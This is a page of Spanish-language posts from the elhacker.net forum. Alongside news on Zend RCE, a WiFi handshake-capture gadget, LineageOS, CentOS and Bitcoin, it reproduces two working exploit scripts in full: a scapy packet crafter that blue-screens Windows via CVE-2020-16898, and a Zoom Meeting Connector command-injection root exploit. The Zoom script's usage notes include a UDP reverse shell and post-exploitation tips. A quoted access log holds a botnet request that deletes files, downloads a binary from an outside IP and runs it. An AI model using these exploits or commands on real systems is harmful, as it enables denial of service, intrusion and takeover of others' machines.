elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Temas
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ... 36
61  Seguridad Informática / Bugs y Exploits / PoC Proof-of-Concept - Ping de la Muerte | BSOD exploit for CVE-2020-16898 | Windows TCP/IPv6 en: 5 Enero 2021, 01:16 am
Código
  1. #!/usr/bin/env python3
  2. #
  3. # Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
  4. #
  5. # Author: Adam 'pi3' Zabrocki
  6. # http://pi3.com.pl
  7. #
  8.  
  9. from scapy.all import *
  10.  
  11. v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
  12. v6_src = "fe80::24f5:a2ff:fe30:8890"
  13.  
  14. p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
  15. p_test = p_test_half + 'A'.encode()*4
  16.  
  17. c = ICMPv6NDOptEFA();
  18.  
  19. e = ICMPv6NDOptRDNSS()
  20. e.len = 21
  21. e.dns = [
  22. "AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
  23. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  24. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  25. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  26. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  27. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  28. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  29. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  30. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  31. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
  32.  
  33. pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
  34.      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
  35.  
  36. p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
  37.              IPv6ExtHdrFragment()/pkt
  38.  
  39. l=fragment6(p_test_frag, 200)
  40.  
  41. for p in l:
  42.    send(p)
  43.  
  44.  

Vaya, es repetido, ya lo puse en:

https://foro.elhacker.net/bugs_y_exploits/ping_de_la_muerte_para_windows_10_ipv6-t507320.0.html
62  Seguridad Informática / Bugs y Exploits / Zoom 4.6.239.20200613 Meeting Connector Post-Auth Remote Root Exploit en: 5 Enero 2021, 00:48 am
Zoom version 4.6.239.20200613 suffers from a Meeting Connector post-authentication remote root code execution vulnerability via the proxy server functionality. The latest Zoom client has this issue patched per Zoom.

Código
  1. #!/usr/bin/python
  2. # -*- coding: UTF-8 -*-
  3. #
  4. # zoomer.py
  5. #
  6. # Zoom Meeting Connector Post-auth Remote Root Exploit
  7. #
  8. # Jeremy Brown [jbrown3264/gmail]
  9. # Dec 2020
  10. #
  11. # The Meeting Connector Web Console listens on port 5480. On the dashboard
  12. # under Network -> Proxy, one can enable a proxy server. All of the fields
  13. # are sanitized to a certain degree, even the developers noting in the proxy()
  14. # function within backend\webconsole\WebConsole\net.py that they explicitly
  15. # were concerned with command injection and attempted to prevent it:
  16. #
  17. # if ('"' in proxy_name) or ('"' in proxy_passwd):  # " double quotes cannot be used to prevent shell injection
  18. #     is_valid = False
  19. #
  20. # It makes sense to leave some flexibility in the character limits here
  21. # passwords are often expected to contain more than alphanumeric characters.
  22. # But of course that means the Proxy Password field is still vulnerable to
  23. # command injection with the ` character.
  24. #
  25. # The proxy data gets concatenated and written to /etc/profile.d/proxy.sh.
  26. # Every three minutes, a task runs which executes this proxy script as root.
  27. # After submission the dashboard says “The proxy will take effect after the
  28. # server reboot!”, but the commands will still be executed within actually
  29. # requiring a reboot. Keep in mind that the commands will be executed blind.
  30. #
  31. # For example, `id>/tmp/proxy_test` given as the Proxy Password will produce
  32. # this in the /tmp/proxy_test file:
  33. #
  34. # uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023
  35. #
  36. # MMR was tested, but Controller and VRC may also be vulnerable
  37. #
  38. # Usage
  39. # > zoomer.py 10.0.0.10 admin xsecRET1 "sh -i >& /dev/udp/10.0.0.11/5555 0>&1"
  40. # login succeeded
  41. # command sent to server
  42. #
  43. # $ nc -u -lvp 5555
  44. # ....
  45. # sh: no job control in this shell
  46. # sh-4.2# pwd
  47. # /root
  48. # sh-4.2#
  49. #
  50. # setenforce 0 if SELinux bothers you, service sshd start and add users/keys,
  51. # check tokens in /opt/zoom/conf/register, check out the local environment, etc.
  52. #
  53. # Dependencies
  54. # - pip install pyquery
  55. #
  56. # Fix
  57. # Zoom says they've fixed this in the latest version
  58. #
  59.  
  60. import os
  61. import sys
  62. import argparse
  63. import requests
  64. import urllib.parse
  65. from pyquery import PyQuery
  66. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  67.  
  68. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  69.  
  70. class Zoomer(object):
  71.  def __init__(self, args):
  72.    self.target = args.target
  73.    self.port = args.port
  74.    self.username = args.username
  75.    self.password = args.password
  76.    self.command = args.command
  77.  
  78.  def run(self):
  79.    target = "https://" + self.target + ':' + str(self.port)
  80.  
  81.    session = requests.Session()
  82.    session.verify = False
  83.  
  84.    #
  85.    # get csrftoken from /login and use it to auth with creds
  86.    #
  87.    try:
  88.      resp = session.get(target + "/login")
  89.    except Exception as error:
  90.      print("Error: %s" % error)
  91.      return -1
  92.  
  93.    try:
  94.      csrftoken = resp.headers['set-cookie'].split(';')[0]
  95.    except:
  96.      print("Error: couldn't parse csrftoken from response header")
  97.      return -1
  98.  
  99.    csrfmiddlewaretoken = self.get_token(resp.text, 'csrfmiddlewaretoken')
  100.  
  101.    if(csrfmiddlewaretoken == None):
  102.      return -1
  103.  
  104.    data = \
  105.      {'csrfmiddlewaretoken':csrfmiddlewaretoken,
  106.      'name':self.username,
  107.      'password':self.password}
  108.  
  109.    headers = \
  110.      {'Host':self.target + ':' + str(self.port),
  111.      'Referer':target,
  112.      'Cookie':csrftoken}
  113.  
  114.    try:
  115.      resp = session.post(target + "/login", headers=headers, data=data)
  116.    except Exception as error:
  117.      print("Error: %s" % error)
  118.      return -1
  119.  
  120.    if(resp.status_code != 200 or 'Wrong' in resp.text):
  121.      print("login failed")
  122.      return -1
  123.    else:
  124.      print("login succeeded")
  125.  
  126.    #
  127.    # get csrfmiddlewaretoken from /network/proxy and post cmd
  128.    #
  129.    try:
  130.      resp = session.get(target + "/network/proxy")
  131.    except Exception as error:
  132.      print("Error: %s" % error)
  133.      return -1
  134.  
  135.    csrfmiddlewaretoken = self.get_token(resp.text, 'csrfmiddlewaretoken')
  136.  
  137.    cookies = session.cookies.get_dict()
  138.  
  139.    #
  140.    # this happens with view-only users
  141.    #
  142.    if(len(cookies) < 2):
  143.      print("Error: failed to get session ID")
  144.      return -1
  145.  
  146.    command = '`' + self.command + '`'
  147.  
  148.    headers = \
  149.      {'Host':self.target + ':' + str(self.port),
  150.      'Referer':target,
  151.      'Cookie': \
  152.        'csrftoken=' + cookies['csrftoken'] + ';' + \
  153.        'sessionid=' + cookies['sessionid']}
  154.  
  155.    data = \
  156.      {'csrfmiddlewaretoken':csrfmiddlewaretoken,
  157.      'proxyValue':1,
  158.      'proxyAddr':'localhost',
  159.      'proxyPort':8080,
  160.      'proxyName':'test',
  161.      'proxyPasswd':command}
  162.  
  163.    try:
  164.      resp = session.post(target + "/network/proxy", headers=headers, data=data)
  165.    except Exception as error:
  166.      print("Error: %s" % error)
  167.      return -1
  168.  
  169.    if(resp.status_code != 200):
  170.      print("something failed")
  171.      return -1
  172.    else:
  173.      print("command sent to server")
  174.  
  175.    return 0
  176.  
  177.  def get_token(self, body, name):
  178.    token = None
  179.  
  180.    pq = PyQuery(body)
  181.  
  182.    if(name == 'csrftoken'):
  183.      print("csrftoken")
  184.  
  185.    if(name == 'csrfmiddlewaretoken'):
  186.      token = pq('input').attr('value')
  187.  
  188.    return token
  189.  
  190. def arg_parse():
  191.  parser = argparse.ArgumentParser()
  192.  
  193.  parser.add_argument("target",
  194.            type=str,
  195.            help="Zoom server")
  196.  
  197.  parser.add_argument("-p",
  198.            "--port",
  199.            type=int,
  200.            default=5480,
  201.            help="Zoom port")
  202.  
  203.  parser.add_argument("username",
  204.            type=str,
  205.            help="Valid username")
  206.  
  207.  parser.add_argument("password",
  208.            type=str,
  209.            help="Valid password")
  210.  
  211.  parser.add_argument("command",
  212.            type=str,
  213.            help="Command to execute (replace space with $IFS ?)")
  214.  
  215.  args = parser.parse_args()
  216.  
  217.  return args
  218.  
  219. def main():
  220.  args = arg_parse()
  221.  
  222.  zm = Zoomer(args)
  223.  
  224.  result = zm.run()
  225.  
  226.  if(result > 0):
  227.    sys.exit(-1)
  228.  
  229. if(__name__ == '__main__'):
  230.  main()
  231.  
  232. #  0day.today [2021-01-05]  #


Fuente:
https://0day.today/exploit/35584
63  Seguridad Informática / Bugs y Exploits / Packet Storm New Exploits For 2020 en: 5 Enero 2021, 00:46 am
Citar
    Complete comprehensive archive of all 1,949 exploits added to Packet Storm in 2020.



https://packetstormsecurity.com/files/download/160738/2020-exploits.tgz
64  Seguridad Informática / Nivel Web / Ejecución remota de código de Zend Framework (PHP) en: 5 Enero 2021, 00:07 am
Esta vulnerabilidad encontrada como CVE-2021-3007 también puede afectar algunas instancias del proyecto Laminas, el sucesor de Zend.

Zend Framework consta de paquetes PHP instalados en 570 millones veces. Los desarrolladores utilizan el marco para crear aplicaciones web orientadas a objetos.

https://github.com/Ling-Yizhou/zendframework3-/blob/main/zend%20framework3%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%20rce.md

En un exploit de prueba de concepto (PoC), el investigador demostró cómo la aplicación web phpinfo page analizó con éxito su comando del sistema "whoami" pasó a través de una solicitud HTTP serializada y devolvió el nombre de la cuenta de Windows, "nt Authority system".



En enero de 2020, Zend Framework fue migrado al proyecto Laminas con una cantidad significativa de código que simplemente se transfirió a la nueva base de código.

Por ejemplo, Zend's Stream.php La clase con el destructor antes mencionado continúa existiendo en algunas versiones de Laminas.

Considerando los poderes de PHP alrededor del 80% de los sitios de Internet De alguna manera, y dada la popularidad histórica del Zend Framework, se recomienda a los desarrolladores que revisen minuciosamente sus aplicaciones web para detectar casos de deserialización de objetos que no sean de confianza.
65  Seguridad Informática / Materiales y equipos / The Hash Monster: ESP32 Tamagotchi para descifrar WiFi en: 31 Diciembre 2020, 00:55 am
Citar
Las redes WiFi son cada vez más seguras. Aunque el protocolo WPA2 tiene vulnerabilidades, y el WPA3 todavía está por llegar a muchos operadores.

Ahora, un pequeño dispositivo aparentemente inofensivo puede ayudar a hackear redes WiFi. Este dispositivo, llamado Hash Monster, está inspirado en un Tamagochi de código libre que corre sobre el. Una plataforma portátil con chips ESP32, los cuales tienen doble núcleo, wifi y Bluetooth, son baratos y de bajo consumo. Ahora bien, la misión de esta mascota es capturar handshakes PSK de redes WPA y WPA2 y otros hashes que contengan el PMKID, lo cual permite crackearlo luego en un PC usando hashcat, que aprovecha la excelente capacidad de paralelización que tienen las tarjetas gráficas, obteniendo así la clave en texto plano de la red.

Tanto el M5Stack como el Hash Monster son de código libre por lo que cualquiera puede montarse uno siguiendo este how-to.


¿Te gustaría tener una herramienta de captura de WiFi portátil que quepa en su bolsillo? Un dispositivo que guarda las capturas de PCAP en una tarjeta micro sd para luego revisarlas en Wireshark o descifrar esas contraseñas WPA / WPA2. Suena como algo sacado del conjunto de herramientas WiFi espía de la NSA, pero es muy fácil de configurar con el ESP32 WiFi Hash Monster y el kit de desarrollo de IoT M5Stack CORE de $ 35.



El monstruo hash

Si ahora está pensando que parece similar al proyecto Pwnagotchi y no es causal, G4lile0, el autor de Hash Monster, se inspiró en él para hacer una alternativa que se ejecuta en el M5 Stack Development Kit, una plataforma portátil con tecnología ESP32. ESP32 es una serie de sistemas de doble núcleo de hasta 240 Mhz, de bajo costo y bajo consumo en un microcontrolador de chip con Wi-Fi integrado y Bluetooth / BLE de modo dual.

https://github.com/evilsocket/pwnagotchi

Pwnagotchies un dispositivo similar a tamagochi que funciona con bettercap y se ejecuta en una Raspberry Pi Zero W que aprende de su entorno WiFi circundante para maximizar el material de clave WPA que se puede romper que captura (ya sea mediante rastreo pasivo o realizando ataques de desautenticación y asociación). Este material se recopila en el disco como archivos PCAP que contienen cualquier forma de apretón de manos compatible con hashcat, incluidos apretones de manos WPA completos y medios, así como PMKID. O dicho rápido, es un tamagochi que come apretones de manos WiFi para ser feliz.



Hash Monster se ejecuta en un tamaño más pequeño y una plataforma más barata superior al Pwnagotchi en varios aspectos. Si bien Pwnagotchi se basa en Raspberry Pi Zero y requiere ensamblar un kit de bricolaje con varios componentes, como una pantalla eInk y un banco de energía externo, el Hash Monster funciona directamente en el pequeño dispositivo M5Stack. M5 Stack combina un ESP32 con una pequeña pantalla LCD, botones y batería interna. Es un dispositivo modular, apilable, escalable y portátil que se alimenta con un núcleo ESP-32, lo que lo hace de código abierto, de bajo costo, con todas las funciones y fácil para los desarrolladores manejar el desarrollo de productos ESP32 IoT. Puede programar M5Stack a través de Arduino, C ++, Blockly o MicroPython, por nombrar algunos. El kit de desarrollo completo para M5 Stack ofrece un precio asequible y recursos completos, lo que lo convierte en un buen kit de inicio para explorar ESP32. Si bien el M5 Stack incluye una batería incorporada de 110 mAh, se puede actualizar con un módulo de extensión de batería lipo apilable de 700 mAh.

La similitud entre Pwnagotchi y Hash Monster es que capturan tanto los apretones de manos de PSK de las redes WPA / WPA2 como los hash de PSK contenidos en marcos de baliza con PMKID. Una gran ventaja del descifrado de PMKID es que todo lo que necesita está disponible por aire, incluso si no hay estaciones conectadas y solo se requiere una captura de paquete. Posteriormente podremos crackear estos hashes con herramientas estándar como aircrack o hashcat, y así obtener las credenciales. Por supuesto, solo deberíamos hacer esto en redes que gestionamos nosotros mismos o que tenemos permiso para auditar.

https://github.com/G4lile0/ESP32-WiFi-Hash-Monster


Fuente y más información (en inglés)
https://telescope.ac/petazzoni/the-hash-monster-esp32-tamagotchi-for-wifi-cracking
66  Comunicaciones / Android / Resucita tu móvil viejo con LineageOS: Samsung Galaxy S2 de 2011 en: 21 Diciembre 2020, 22:41 pm
LineageOS, la ROM personalizada por excelencia, es capaz de permitirnos darle nueva vida a nuestro dispositivo de hace tres o cuatro años. El "milagro" no es ese, sino que LineageOS sea capaz hoy en día de revivir terminales como el Samsung Galaxy S2 que se lanzó en 2011, de ser una opción excepcional para terminales muy (pero muy) baratos.

En 2011 llegaba el Galaxy S2 (o S II), el buque insignia de una Samsung que se posicionaba como la referencia clara del mercado Android. Contaba con una pantalla Super AMOLED de 4,3 pulgadas y 800x480 píxeles, un Exynos 4210 dual-core, 1 GB de RAM y 16 o 32 GB de capacidad, además de 1.650 mAh de batería y una cámara de 8 MP f/2.6 que para la época era una pequeña maravilla. ¿Su otro detalle importante? Que el sistema operativo preinstalado era Android 2.3.4 'Gingerbread'.

Gracias a la versión no oficial de LineageOS 18.1 que un desarrollador (o "cocinero", como se les suele conocer) ha preparado para que este terminal pueda disfrutar de las ventajas de esta ROM basada en Android 11. Alucinante.

Este es un buen ejemplo de cómo LineageOS permite rescatar dispositivos del pasado sin aparentes problemas. El soporte a viejos dispositivos sigue siendo excepcional, y entre los móviles míticos en los que aún puedes instalar este sistema operativo están el Xiaomi Mi 3 (2013), LG Nexus 4 (2012), HTC One (2013), LG G2 (2013), Motorola Moto G (2013), y cómo no uno de los referentes de la comunidad de cocineros, el OnePlus One (2014).

Soporte móviles viejos:
https://wiki.lineageos.org/devices/

Y eso si solo tenemos en cuenta el soporte oficial, porque el Galaxy S2 es un ejemplo de ese otro soporte "oficioso" que cocineros que van por libre acaban ofreciendo a terminales que quieren seguir soportando. Aquí hay ejemplos como el del mítico HTC HD2 de 2009 que no tiene versión tan actual, pero que sí es posible actualizar a LineageOS 15.1 (basado en Android 8.1), algo alucinante para un terminal que ya tiene 11 años de vida.

HTC HD2
https://forum.xda-developers.com/t/lineageos-15-1-android-8-1-for-htc-hd2.4058195/

En Reddit comentaban hace tiempo algunos ejemplos que pueden dar buen servicio a sus propietarios como un Galaxy S5, un ZTE Axon mini, un Nexus 5 o un Moto G4 Play. Muchos de ellos se pueden conseguir por 50 euros o menos si sabemos buscar.

https://www.reddit.com/r/LineageOS/comments/7vlz0i/cheapest_lineage_os_supported_phone/

Fuente:
https://www.xataka.com/moviles/lineageos-maravilla-resucita-al-samsung-galaxy-s2-2011-tambien-pone-android-rpi-4-terminales-muy-baratos
67  Sistemas Operativos / GNU/Linux / ¿El fin de Centos 8?: Centos Stream, Rocky Linux o CloudLinux en: 21 Diciembre 2020, 18:30 pm
Me extraña que nadie haya comentado una de las noticias del año en GNU/Linux

Red Hat detiene el desarrollo de CentOS 8 en favor de CentOS Stream

 RedHat anunció el fin del proyecto CentOS Linux, se apresuró a dejar claro que el nuevo "CentOS Stream no es un reemplazo" para dicha distribución, hasta ahora la más popular en el ámbito de los servidores junto a Debian y Ubuntu.

Y es cierto: CentOS Stream, al contrario de CentOS Linux, actuará como versión de desarrollo de Red Hat Enterprise Linux, en lugar de limitarse a recompilar los binarios de ésta sin referencias a las marcas y logos de Red Hat (y, por lo tanto, de forma gratuita).

La comunidad de CentOS aceptó pasar a ser patrocinada por RedHat, poniendo en sus manos la marca y el futuro de la distribución, y pasando sus desarrolladores a engrosar la plantilla de la compañía. A cambio, Red Hat debía salvaguardar la naturaleza del proyecto.

Pero ahora, tan sólo un año después de la adquisición de Red Hat por parte de IBM, dicha promesa ha sido traicionada. Eso por no hablar de la promesa de mantener el soporte de cada versión de CentOS durante 10 años, muy apreciada dado el tipo de entornos donde se instalaba, pero que será vulnerada en el caso de CentOS, cuyo soporte ahora finalizará en 2021.

Red Hat recomienda que los usuarios de CentOS 8 migren a CentOS Stream, indicando que habrá pequeñas diferencias con las versiones de RHEL y que las actualizaciones se publicarán con regularidad, de forma similar a CentOS tradicional.

Como ejemplo de empresas que ya utilizan CentOS Stream en sus infraestructuras se menciona Facebook, que ha migrado sus servidores a su propia distribución basada en CentOS Stream.

CloudLinux y el nuevo Rocky Linux salen al rescate de los usuarios de CentOS tras el volantazo de Red Hat

Rocky Linux



uno de los co-creadores de CentOS, Gregory Kurtzer, quien aprovechó el momento de desconcierto para animar a usuarios y desarrolladores a unirse a un nuevo proyecto comunitario basado en RHEL y que, además, facilite la transición desde CentOS a la nueva distribución.

Este nuevo proyecto nacía con poco respaldo más que la influencia de Kurtzer y un nombre, Rocky Linux, otorgado en honor al otro co-creador de CentOS, el ya fallecido Rocky McGough. Pero en poco más de dos días ha logrado poner a 750 voluntarios bajo su bandera, decididos a recuperar el espíritu del proyecto CentOS.

CloudLinux

Si antes has echado en falta una mención a CloudLinux entre las alternativas a CentOS no te falta razón: también es una distribución basada en RHEL y muy bien valorada en el ámbito de los servidores.

Sin embargo, al contrario que Scientific Linux, Oracle Linux y, con el tiempo, Rocky Linux, CloudLinux no es un mero clónico de RHEL, sino que introduce cambios dirigidos a optimizar el sistema para la tarea de proporcionar alojamientos compartidos.

Eso no ha impedido a los responsables de esta distribución anunciar la creación de una nueva distribución paralela, comunitaria y gratuita, que se ajuste el esquema seguido hasta ahora por CentOS, aprovechando que ya cuentan con "toda la infraestructura, software y experiencia necesarios". Aunque aún carece de nombre, su lanzamiento tendrá lugar durante el primer trimestre de 2021.

Fuentes:
https://www.genbeta.com/linux/cloudlinux-nuevo-rocky-linux-salen-al-rescate-usuarios-centos-volantazo-red-hat
68  Foros Generales / Sugerencias y dudas sobre el Foro / Renovarse o morir: 20º aniversario de elhacker.NET 2.0 (Febrero 2021) en: 21 Diciembre 2020, 16:52 pm


Para celebrar el 20 aniversario de elhacker.NET (Febrero de 2001-Febrero 2021) el foro actual será migrado a un nuevo servidor dedicado (12 cores, 128GB de ram y discos raid 1 nvme).

Pero la novedad más importante es la migración actual del sistema de foros que utilizamos SMF 1 a SMF 2

El foro está siendo migrando (pruebas) de SMF 1 a SMF 2, no sin algunos problemas previos. Ya que las modificaciones del SMF 1.x que estamos usando no son precisamente pocas.

En principio se migrará lógicamente todo el contenido (mensajes, foros, usuarios, etc). Se pasará a de usar el charset  ISO-8859-1 a UTF-8, tanto en los ficheros de idioma con en la BD que también se convertirá InnoDB (ahora usa MyISAM). También se redireccionarán las URL's antiguas a las nuevas para no perder los enlaces internos y externos del foro (de Seo4SMF a Pretty URL's)

Se conservarán las plantillas actuales (diseño de los themes), pero se cambiará la plantilla por defecto actual.

Se migrarán y adaptarán y los mods actuales:

Listado de Mods (modificaciones que estamos usando)
- sha + passwordSalt de las contraseñas del foro
- Youtube Tag Code
- GeShi (editor de código)
- Tag Youtube
- LaTex (formulas matemáticas)
- Security Login (aviso por e-mail intentos fallido a parte de bloqueos automáticos)

Y la idea será añadir nuevas características que pidan los usuarios:

Mods nuevos (características)
O implementar (2FA, WAP, mobile version, reponsive theme), creación de nuevos foros, subforos e incluso categorías.

También sería muy interesante acabar la re-estructuración y reorganización de los foros y subforos actuales para una mejor ordenación. Durante el año 2020 sólo se han realizado pequeños cambios de nombre de foros y subforos.

elhacker.NET will never die
69  Seguridad Informática / Nivel Web / GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86 en: 19 Diciembre 2020, 12:43 pm
Instalo un servidor web nuevo sin contenido, ni nada y a los pocos minutos ya recibo peticiones maliciosas xD

Citar
85.93.182.254 - - [14/Dec/2020:12:55:09 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
68.150.109.112 - - [14/Dec/2020:12:58:24 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 196 "-" "Hello, world"
200.160.123.172 - - [14/Dec/2020:12:59:19 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.236.61 - - [14/Dec/2020:13:13:59 +0100] "GET / HTTP/1.1" 200 481 "-" "Mozilla/5.0 zgrab/0.x"
207.180.140.98 - - [14/Dec/2020:13:29:51 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.237.198 - - [14/Dec/2020:13:34:45 +0100] "\x16\x03\x01" 400 226 "-" "-"
151.233.51.20 - - [14/Dec/2020:13:39:55 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
123.115.60.33 - - [14/Dec/2020:13:55:26 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
123.115.60.33 - - [14/Dec/2020:13:55:27 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.238.100 - - [14/Dec/2020:13:56:04 +0100] "\x16\x03\x01" 400 226 "-" "-"
94.102.59.99 - - [14/Dec/2020:14:00:20 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
222.117.123.238 - - [14/Dec/2020:14:13:16 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
220.81.245.117 - - [14/Dec/2020:15:23:00 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
172.69.33.42 - - [14/Dec/2020:15:57:06 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.33.42 - - [14/Dec/2020:15:57:59 +0100] "\x16\x03\x01" 400 226 "-" "-"
108.162.215.115 - - [14/Dec/2020:15:59:00 +0100] "\x16\x03\x01" 400 226 "-" "-"
108.162.215.115 - - [14/Dec/2020:15:59:26 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:15:59:29 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.35.46 - - [14/Dec/2020:15:59:29 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:16:01:35 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:16:02:24 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.112 - - [14/Dec/2020:16:03:22 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.112 - - [14/Dec/2020:16:05:27 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:05 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:10 +0100] "\x16\x03\x01\x02" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:11 +0100] "\x16\x03\x01\x02" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:43 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.52 - - [14/Dec/2020:16:07:44 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.34.229 - - [14/Dec/2020:16:08:41 +0100] "\x16\x03\x01" 400 226 "-" "-"
165.227.4.106 - - [14/Dec/2020:16:10:34 +0100] "GET / HTTP/1.0" 200 481 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
2.57.122.212 - - [14/Dec/2020:16:14:03 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"


Creo que será interesante publicar el  log de mod_security del servidor web para ver la cantidad inhumana de peticiones.
70  Foros Generales / Noticias / El Bitcoin rompe la barrera de los 20.000 dólares en: 17 Diciembre 2020, 12:29 pm
Un crecimiento de más del 5,5% durante las últimas 24 horas y más del 170% en lo que llevamos de año.


El bitcoin supera la barrera de los 20.000 dólares por primera vez en su historia


La famosa criptomoneda alcanzó su valor máximo y ha triplicado su precio desde principios de año. Sin embargo, muchos expertos e inversionistas consideran que el bitcoin sigue teniendo mucha volatilidad.



Desde principios de año el bitcoin ha subido cerca de un 190%, impulsado por el interés de inversores tradicionales que desconfiaban antes de esta criptomoneda. Pero el precio empezó realmente a dispararse a fines de octubre por el lanzamiento de un servicio de compra, venta y pago por criptomoneda del gigante de pagos Paypal. Desde entonces esta criptomoneda ha ganado más de un 40%
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ... 36
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines